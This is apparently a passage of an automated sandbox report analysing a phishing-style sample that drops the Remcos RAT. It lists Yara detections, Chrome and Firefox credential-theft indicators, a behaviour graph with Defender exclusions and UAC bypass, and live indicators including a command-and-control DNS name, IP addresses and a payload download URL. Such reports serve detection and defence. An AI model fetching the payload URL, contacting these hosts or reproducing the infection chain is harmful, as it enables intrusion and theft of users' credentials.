Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF8D24 GetLocalTime, 14_2_02FF8D24
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A964 GetUserNameA, 14_2_0300A964
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 20_2_004491DA
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFB224 GetVersionExA, 14_2_02FFB224
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 20_2_0040B59B
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 20_2_0040B6B5

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 20_2_00405091
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649114 Sample: Payment reference no. - FT9... Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 70 bb990a9a6fafe.duckdns.org 2->70 72 www.nawatbsc.com 2->72 98 Found malware configuration 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 Multi AV Scanner detection for submitted file 2->102 106 13 other signatures 2->106 11 wscript.exe 1 1 2->11         started        14 Xdnxwtne.PIF 2->14         started        16 svchost.exe 2->16         started        signatures3 104 Uses dynamic DNS services 70->104 process4 dnsIp5 116 Malicious encrypted Powershell command line found 11->116 118 JScript performs obfuscated calls to suspicious functions 11->118 120 Wscript starts Powershell (via cmd or directly) 11->120 124 3 other signatures 11->124 19 wscript.exe 1 11->19         started        122 Allocates many large memory junks 14->122 22 colorcpl.exe 14->22         started        68 127.0.0.1 unknown unknown 16->68 signatures6 process7 signatures8 108 Malicious encrypted Powershell command line found 19->108 110 Wscript starts Powershell (via cmd or directly) 19->110 112 Encrypted powershell cmdline option found 19->112 114 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->114 24 powershell.exe 14 17 19->24         started        28 powershell.exe 7 19->28         started        31 powershell.exe 7 19->31         started        process9 dnsIp10 74 www.nawatbsc.com 185.208.156.66, 49681, 80 SIMPLECARRIERCH Switzerland 24->74 66 C:\Users\user\AppData\Local\Temp\loader.exe, PE32 24->66 dropped 33 loader.exe 1 7 24->33         started        37 conhost.exe 24->37         started        126 Adds a directory exclusion to Windows Defender 28->126 128 Powershell drops PE file 28->128 39 powershell.exe 23 28->39         started        41 conhost.exe 28->41         started        43 reg.exe 1 1 31->43         started        45 conhost.exe 31->45         started        file11 signatures12 process13 file14 64 C:\Users\user\Links\Xdnxwtne.PIF, PE32 33->64 dropped 86 Drops PE files with a suspicious file extension 33->86 88 Writes to foreign memory regions 33->88 90 Allocates memory in foreign processes 33->90 96 4 other signatures 33->96 47 colorcpl.exe 6 3 33->47         started        52 cmd.exe 1 33->52         started        54 cmd.exe 1 33->54         started        92 Loading BitLocker PowerShell Module 39->92 56 WmiPrvSE.exe 39->56         started        94 Adds extensions / path to Windows Defender exclusion list (Registry) 43->94 signatures15 process16 dnsIp17 76 103.186.117.225, 6666, 9916 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 47->76 62 C:\ProgramData\mkwain\logs.dat, data 47->62 dropped 78 Contains functionality to bypass UAC (CMSTPLUA) 47->78 80 Contains functionalty to change the wallpaper 47->80 82 Contains functionality to steal Chrome passwords or cookies 47->82 84 2 other signatures 47->84 58 conhost.exe 52->58         started        60 conhost.exe 54->60         started        file18 signatures19 process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.186.117.225
 unknown unknown
7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe true
185.208.156.66
 www.nawatbsc.com Switzerland
42624 SIMPLECARRIERCH false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
bb990a9a6fafe.duckdns.org 146.70.83.186 true
www.nawatbsc.com 185.208.156.66 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
bb990a9a6fafe.duckdns.org true
  • Avira URL Cloud: safe
 unknown
http://www.nawatbsc.com/file/loader.exe false
  • Avira URL Cloud: safe
 unknown